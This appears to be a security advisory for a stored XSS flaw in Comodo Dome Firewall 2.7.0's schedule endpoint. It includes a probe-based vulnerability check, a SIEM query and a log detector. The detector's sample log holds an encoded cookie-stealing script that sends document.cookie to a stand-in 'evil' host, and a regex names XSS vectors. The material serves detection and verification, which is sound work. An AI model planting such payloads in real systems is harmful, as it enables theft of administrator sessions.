CVE-2019-25419

7.2 HIGH

📋 TL;DR

Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability in the schedule endpoint of its web management interface. An authenticated attacker can inject JavaScript via the SCHNAME parameter of a POST request; the payload is stored with the schedule entry and executes in the browser of every administrator who later views the schedule page. Administrators of Comodo Dome Firewall 2.7.0 installations are the affected users.

💻 Affected Systems

Products:
  • Comodo Dome Firewall
Versions: 2.7.0
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the web management interface's schedule functionality.

📦 What is this software?

Comodo Dome Firewall is a network firewall product from Comodo. Version 2.7.0 is administered through a web management interface, and the vulnerable schedule functionality is part of that interface.

⚠️ Risk & Real-World Impact

🔴 Worst Case

A payload stored in a schedule entry runs in the browser of every administrator who views the page. Attackers could steal administrator session cookies, hijack administrative sessions, act with that administrator's privileges on the firewall (including installing backdoors), and pivot to internal network systems.

🟠 Likely Case

Attackers steal administrator credentials or session tokens to gain unauthorized administrative access to the firewall.

🟢 If Mitigated

With HTML output encoding of SCHNAME where it is rendered on the schedule page, and server-side input validation as a second layer, an injected payload is displayed as text rather than executed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account that can submit to the schedule endpoint, but proof-of-concept code is publicly available. Because the XSS is stored, the attacker only needs to submit the payload once; it fires against any administrator who later views the schedule page.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not publicly available

Restart Required: No

Instructions:

1. Check the Comodo vendor website for security updates for Dome Firewall.
2. Apply any available patches.
3. Verify the fix by retesting the schedule endpoint (see How to Verify below).

🔧 Temporary Workarounds

Input Validation Filter

Platform: all

Implement server-side validation that rejects or sanitizes SCHNAME values containing markup, and HTML-encode the value wherever the schedule page renders it.

Not applicable to operators: requires modification of the appliance's code, which only the vendor can deliver.

Content Security Policy

Platform: all

Serve the management interface with a strict Content-Security-Policy header that disallows inline scripts, so an injected script tag does not execute even if the stored value is rendered unencoded.

Not applicable to operators: requires a change to the appliance's web server configuration.

🧯 If You Can't Patch

  • Restrict access to the firewall management interface to trusted IP addresses only, and limit the number of accounts that can create or edit schedule entries.
  • Implement web application firewall rules that block XSS payloads in POST requests to the schedule endpoint; decode URL-encoded (and double-encoded) bodies before matching, since SCHNAME is submitted form-encoded.

🔍 How to Verify

Check if Vulnerable:

Log in as an administrator on a test system (the payload is stored and will fire for every administrator who views the page), submit a benign probe such as <script>alert('test')</script> in the schedule endpoint's SCHNAME parameter, then view the schedule page. If the probe executes, or the raw tag appears unencoded in the page source rather than as &lt;script&gt;, the system is vulnerable. Include a unique marker string in the probe so you can tell your own test entry apart from anything else on the page.

Check Version:

Check the firewall web interface for version information, typically under System > About or similar menu.

Verify Fix Applied:

Retest with the same XSS payload after applying fixes to confirm it no longer executes.
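The verification procedure above, as an added example that is not part of the original advisory or Comodo's own tooling: it stores a harmless probe (a tagged element, no alert) in SCHNAME, reads the schedule page back, and classifies whether the probe came back raw (vulnerable), HTML-encoded (fixed), altered, or absent. The endpoint path `/schedule`, the use of a session cookie for authentication, and the assumption that the page lists entries by name are all hypothetical; adjust them to the appliance. Only `classify_reflection` is exercised offline.

```python
import html
import secrets

try:
    import requests  # only needed for check_live(); the offline classifier does not use it
except ImportError:  # pragma: no cover
    requests = None

# Hypothetical path: the advisory only says "the schedule endpoint".
SCHEDULE_ENDPOINT = "/schedule"


def make_probe():
    """Return (nonce, payload).

    The nonce is a random tag so the probe can be told apart from other content
    on the page; the payload is a harmless <b> element rather than <script> so the
    check is safe to run while still proving whether markup is rendered raw.
    """
    nonce = secrets.token_hex(8)
    payload = '<b id="xss%s">x</b>' % nonce
    return nonce, payload


def classify_reflection(page_html, nonce, payload):
    """Classify how the stored SCHNAME value comes back on the schedule page.

    'unencoded' -> the tag is intact in the HTML: stored XSS (vulnerable)
    'encoded'   -> only an HTML-escaped copy is present: rendered as text (fixed)
    'altered'   -> the nonce survived but the tag was changed (filtered/sanitized)
    'absent'    -> the probe is not on the page at all (not stored, or listed elsewhere)
    """
    if payload in page_html:
        return "unencoded"
    if html.escape(payload, quote=True) in page_html or html.escape(payload, quote=False) in page_html:
        return "encoded"
    if nonce in page_html:
        return "altered"
    return "absent"


def check_live(base_url, session_cookies, verify_tls=True):
    """Store the probe via POST and read it back from the schedule page.

    Requires an already-authenticated administrator session (cookies dict).
    Run this against a test system: the entry persists until you delete it.
    """
    if requests is None:
        raise RuntimeError("the live check needs the 'requests' package")
    nonce, payload = make_probe()
    s = requests.Session()
    s.cookies.update(session_cookies)
    s.post(base_url + SCHEDULE_ENDPOINT, data={"SCHNAME": payload}, verify=verify_tls)
    page = s.get(base_url + SCHEDULE_ENDPOINT, verify=verify_tls).text
    return classify_reflection(page, nonce, payload)


if __name__ == "__main__":
    # Offline demonstration on constructed page fragments.
    nonce, payload = make_probe()
    for fragment in ("<td>%s</td>" % payload, "<td>%s</td>" % html.escape(payload), "<td>none</td>"):
        print(classify_reflection(fragment, nonce, payload), "<-", fragment)
```

Retest with the same probe after patching: a result of "encoded" is the expected outcome of a correct fix, whereas "altered" means a filter stripped the tag, which is weaker than output encoding and worth re-checking with other payload shapes.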

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to schedule endpoint with JavaScript payloads in parameters
  • Multiple failed authentication attempts followed by schedule endpoint access

Network Indicators:

  • HTTP POST requests containing script tags or JavaScript code in SCHNAME parameter

SIEM Query:

source="firewall_logs" AND http_method="POST" AND url_path="/schedule" AND parameter="SCHNAME" AND (content="*<script*" OR content="*%3Cscript*" OR content="*javascript:*" OR content="*onerror=*")

The query is pseudo-syntax; map the field names to your SIEM's schema. Match on the POST and the path together rather than either one, and decode URL-encoded request bodies before matching where the platform allows it, since the payload is submitted form-encoded (for example %3Cscript%3E) and may be double-encoded to evade simple string matches.
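The detection logic above run over sample log lines, as an added example that is not part of the original advisory or any Comodo product. It assumes a hypothetical proxy or WAF log format that records the form body of each request (`timestamp client_ip method path "body" status`); the sample lines are constructed. The detector decodes each SCHNAME value repeatedly so that double-encoded payloads are matched in their final form, and tallies hits per source address.

```python
import re
import urllib.parse
from collections import Counter

# Constructed sample lines in a hypothetical log format that captures the form body:
# <timestamp> <client_ip> <method> <path> "<urlencoded body>" <status>
SAMPLE_LOG = """\
2019-06-01T10:00:01Z 10.0.0.5 POST /schedule "SCHNAME=backup-window&START=01:00" 200
2019-06-01T10:00:09Z 10.0.0.9 POST /schedule "SCHNAME=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E&START=02:00" 200
2019-06-01T10:00:15Z 10.0.0.9 POST /schedule "SCHNAME=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E" 200
2019-06-01T10:00:20Z 10.0.0.7 GET /schedule "" 200
2019-06-01T10:00:25Z 10.0.0.7 POST /schedule "SCHNAME=javascript%3Avoid(0)&START=03:00" 200
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)" (\d{3})$')

# Script tags, javascript: URLs, common tag-based vectors, and inline event handlers.
# Deliberately broad: a schedule name has no legitimate reason to contain any of these.
XSS_RE = re.compile(r'<\s*script|javascript\s*:|<\s*(?:img|svg|iframe|body)\b|\bon\w+\s*=', re.I)


def fully_decode(value, max_rounds=3):
    """Decode a form value until it stops changing.

    The first round is form decoding (+ means space); later rounds only undo
    percent-encoding, so a literal '+' inside a decoded payload is preserved.
    Double-encoded payloads (%253C -> %3C -> <) are thus matched in final form.
    """
    value = urllib.parse.unquote_plus(value)
    for _ in range(max_rounds - 1):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def schedule_xss_hits(log_text, endpoint="/schedule", field="SCHNAME"):
    """Return one dict per POST to the schedule endpoint whose SCHNAME value
    matches an XSS pattern after decoding."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a production detector would count these
        ts, ip, method, path, body, status = m.groups()
        if method != "POST" or not path.startswith(endpoint):
            continue
        for pair in body.split("&"):
            if "=" not in pair:
                continue
            key, raw = pair.split("=", 1)
            if urllib.parse.unquote_plus(key) != field:
                continue
            decoded = fully_decode(raw)
            if XSS_RE.search(decoded):
                hits.append({"ts": ts, "ip": ip, "status": status, "value": decoded})
    return hits


def by_source(hits):
    """Count hits per client address; repeated submissions from one address
    are the pattern to escalate on."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = schedule_xss_hits(SAMPLE_LOG)
    for h in found:
        print(h["ts"], h["ip"], repr(h["value"]))
    print(by_source(found))
```

The false-positive surface is the event-handler pattern (`on\w+=`), which can trip on an unrelated value ending in "on" followed by "="; since SCHNAME is a free-form name, triage the hit on the decoded value rather than suppressing the rule.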
